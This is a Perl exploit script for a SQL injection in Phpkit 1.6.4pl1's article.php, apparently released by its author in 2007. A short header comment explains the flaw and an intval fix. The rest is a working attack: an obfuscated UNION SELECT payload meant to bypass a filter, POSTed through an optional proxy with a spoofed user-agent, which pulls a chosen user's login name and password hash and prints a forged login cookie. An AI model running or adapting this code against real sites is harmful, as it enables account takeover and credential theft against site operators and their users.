#!/usr/bin/perl # Vulnerability found & exploit written by $h4d0wl33t (shadowleet) # Contact: shadowleet@safe-mail.net # Phpkit 1.6.4pl1 Non Public Exploit by $hadowleet, # Description: # Vulnerability in file pkinc/public/article.php # On line 71: # # $contentid=(!$contentid && isset($_REQUEST['contentid']) # && intval($_REQUEST['contentid'])>0) ? $_REQUEST['contentid'] : $contentid; # # $contentid gets initialized normal but not going through safe function $sql->f in sql statement # # Use in sql statement: # $contentinfo=$DB->fetch_array($DB->query # ("SELECT * FROM ".$db_tab['content']." where content_id='".$contentid."' LIMIT 1")) # # Security fix: # Replace: # && intval($_REQUEST['contentid'])>0) ? $_REQUEST['contentid'] : $contentid; # with : # && intval($_REQUEST['contentid'])>0) ? intval($_REQUEST['contentid']) : $contentid; # # Conditions: # 1. Magic_quotes needs to be off # 2. There must be any articles in the database. # Have fun :) #_________________________________________________ use LWP; use HTTP::Request; use Getopt::Long; sub header { print "\n"; print " ###################################################\n"; print " #Phpkit 1.6.4pl1 Non Public Exploit by \$hadowleet #\n"; print " # + Hackblock 2007 bypass #\n"; print " ###################################################\n"; print "\n"; } sub usage { print "-------------------------------------------------------------------------------------\n"; print "| Usage: |\n"; print "| exploit.pl |\n"; print "| -url [URL] (http://phpkit.de |\n"; print "| -uid [userid] (1) |\n"; print "| -pre [databaseprefix] (phpkit) |\n"; print "| -p [proxy] (http://proxyip:port) |\n"; print "| |\n"; print "| Example: |\n"; print "| exploit.pl -url http://phpkit.de/ -cat 2 -uid 1 -pre phpkit |\n"; print "| |\n"; print "| Or for standard Values: |\n"; print "| exploit.pl -url http://phpkit.de/ |\n"; print "| |\n"; print "| You need a valid category id, you can get it when you open the link |\n"; print "| http://page.de/include.php?path=contentarchive&type=1 |\n"; print "| and click on one article, then read in the url the catid number and use it |\n"; print "| Standard value for catid is 2 |\n"; print "-------------------------------------------------------------------------------------\n"; } my %parameter = (); GetOptions(\%parameter, "url=s", "uid=i", "pre=s", "p=s", "cat=i"); $url = $parameter{"url"}; $uid = $parameter{"uid"}; $cat = $parameter{"cat"}; $prefix = $parameter{"pre"}; $proxy = $parameter{"p"}; if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url."/";} if($url !~ /http:\/\//){$url = "http://".$url;} if($proxy) { if($proxy !~ /http:\/\//){die ("Proxy format must be: \"http://ip:port\"\n");} } if(!$cat){$cat = 2;} if(!$uid){$uid = 1;} if(!$prefix){$prefix = "phpkit";} $bugfile = "include.php?path=article"; $sqlinjection = "9999999999'/**/UnIoN/**/SeLeCt/**/1,".$cat.",3,CoNcAt('Login:',user_name),5,CoNcAt('Password:',user_pw),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**/FrOm/**/".$prefix."_user/**/WhErE/**/user_id=".$uid."/*--"; $poststring = "contentid=".$sqlinjection; $imgcode = 0; sub Exploit() { $requestpage = $url.$bugfile; print "Requesting Page: ".$requestpage."\n"; my $req = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; if($proxy){$ua->proxy( 'http', $proxy );} $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/' ); #$req->referer($url); $req->referer("http://www.deinemudda.de"); $req->content_type('application/x-www-form-urlencoded'); $contlen = length($poststring); $req->header("content-length" => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); #Debug Modus delete # at beginning of next line #print $content; @name = split(/Login:/,$content); $name = @name[1]; @name = split(/<\/a>/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/<\/font>/,$password); $password = @password[0]; if(!$name && !$password) { print "\n\n"; print "!Exploit failed, ~Magic quotes on~ or article id doesn't exists, just read usage!\n\n"; exit; } print "Data:\n"; print "-----------------------------------------------------\n"; print "Name: " .$name."\n"; print "Password: " .$password."\n\n"; print "Logincookie->:\nuser_id%3E".$uid."%2Cuser_name%3E".$name."%2Cuser_pw%3E".$password."\n\n"; print "-----------------------------------------------------\n"; print "Enjoy the day :)\n"; } #Starting print "\n\nExploiting...\n"; Exploit(); #End #Copyright by $h4d0wl33t 2007